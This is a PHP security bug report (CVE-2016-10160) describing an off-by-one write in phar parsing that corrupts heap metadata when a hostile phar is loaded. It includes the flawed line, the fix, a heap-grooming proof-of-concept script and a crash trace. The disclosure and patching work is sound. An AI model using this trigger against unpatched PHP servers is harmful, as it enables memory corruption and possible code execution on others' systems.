php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #73768 Memory corruption when loading hostile phar
Submitted: 2016-12-16 23:39 UTC Modified: 2017-01-25 11:11 UTC
From: eyal dot itkin at gmail dot com Assigned: stas (profile)
Status: Closed Package: PHAR related
PHP Version: 5.6.29 OS:
Private report: No CVE-ID: 2016-10160
 [2016-12-16 23:39 UTC] eyal dot itkin at gmail dot com
Description:
------------
When loading a hostile phar archive, there is an off-by-one that can cause a memory corruption, and possibly trigger a remote code execution.

phar.c in phar_parse_pharfile() incorrectly '\0' terminates the buffer in case the alias does not match:
buffer[tmp_len] = '\0';

When a hostile archive sets tmp_len to be manifest_length - 14, this will write the '\0' just outside the buffer, thus overriding emalloc's metadata.

The assignment should be replaced with:
buffer[MIN(tmp_len, (size_t)(endbuffer - buffer) - 1)] = '\0';

This fix is connected to bug report #73763 I reported earlier, and both reports should probably be fixed together to assure they correspond to each other.

Test script:
---------------
<?php
	$length = 192;
	$array  = array();
	$x = 0;
	while ( $x < 4 ){
		$array[$x++] = str_repeat($x, ($length - 20));
	}

	try{
		$p = Phar::LoadPhar('example_hostile.phar', 'alias.phar');
	}
	catch(Exception $e){
		echo "Failed to load the phar archive\n";
	}

	$s = str_repeat("\xef\xbe\xad\xde", ($length - 20) / 4);
	while ( $x < 8 ){
		$array[$x++] = str_repeat($x, ($length - 20));
	}
?>

Expected result:
----------------
no crash

Actual result:
--------------
segmentation fault, when accessing address 0xdeadbeef during emalloc:

#0  0x80260e75 in _emalloc ()
#1  0x802610d8 in _safe_emalloc ()
#2  0x801fac73 in zif_str_repeat ()
#3  0x8031b662 in execute_internal ()
#4  0x80274dce in dtrace_execute_internal ()
#5  0x8030cf65 in ?? ()
#6  0x802c56da in execute_ex ()
#7  0x80274c35 in dtrace_execute_ex ()
#8  0x8031d1b6 in zend_execute ()
#9  0x8028510d in zend_execute_scripts ()
#10 0x80224054 in php_execute_script ()
#11 0x8031f01f in ?? ()
#12 0x800fe64f in main ()
(gdb) info reg
eax            0xdeadbeef	-559038737
ecx            0xb5000074	-1258291084
edx            0xd	13
ebx            0xb5000040	-1258291136
esp            0xbffedf80	0xbffedf80
ebp            0xb50131e0	0xb50131e0
esi            0x7	7
edi            0x1	1
eip            0x80260e75	0x80260e75 <_emalloc+101>
eflags         0x210282	[ SF IF RF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-12-27 07:03 UTC] stas@php.net
-Status: Open +Status: Feedback
 [2016-12-27 07:03 UTC] stas@php.net
Please provide example_hostile.phar.
 [2016-12-27 09:07 UTC] eyal dot itkin at gmail dot com
-Status: Feedback +Status: Open
 [2016-12-27 09:07 UTC] eyal dot itkin at gmail dot com
Uploaded the example_hostile.phar (+ the python script than generated it) to this link: http://www.cs.tau.ac.il/~eyalitki/Upload/73768/
 [2016-12-30 23:59 UTC] stas@php.net
-PHP Version: 7.1.0 +PHP Version: 5.6.29 -Assigned To: +Assigned To: stas
 [2016-12-30 23:59 UTC] stas@php.net
The fix is in security repo as b28b8b2fee6dfa6fcd13305c581bb835689ac3be and in https://gist.github.com/84961673ee34be7f1a52b83dd872af50

please verify
 [2016-12-31 01:00 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2016-12-31 08:50 UTC] eyal dot itkin at gmail dot com
I verified the fix in the repository, and it will indeed solve this vulnerability.

Wanted to ask why did the PHP version changed to 5.X instead of 7.X? The vulnerability was found (and reproduced) in the latest PHP version, and it also (but not only) applies to previous versions.
 [2017-01-03 05:11 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=b28b8b2fee6dfa6fcd13305c581bb835689ac3be
Log: Fix bug #73768 - Memory corruption when loading hostile phar
 [2017-01-03 05:11 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2017-01-03 05:26 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=b28b8b2fee6dfa6fcd13305c581bb835689ac3be
Log: Fix bug #73768 - Memory corruption when loading hostile phar
 [2017-01-25 11:11 UTC] kaplan@php.net
-CVE-ID: needed +CVE-ID: 2016-10160
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Tue Dec 03 17:01:29 2024 UTC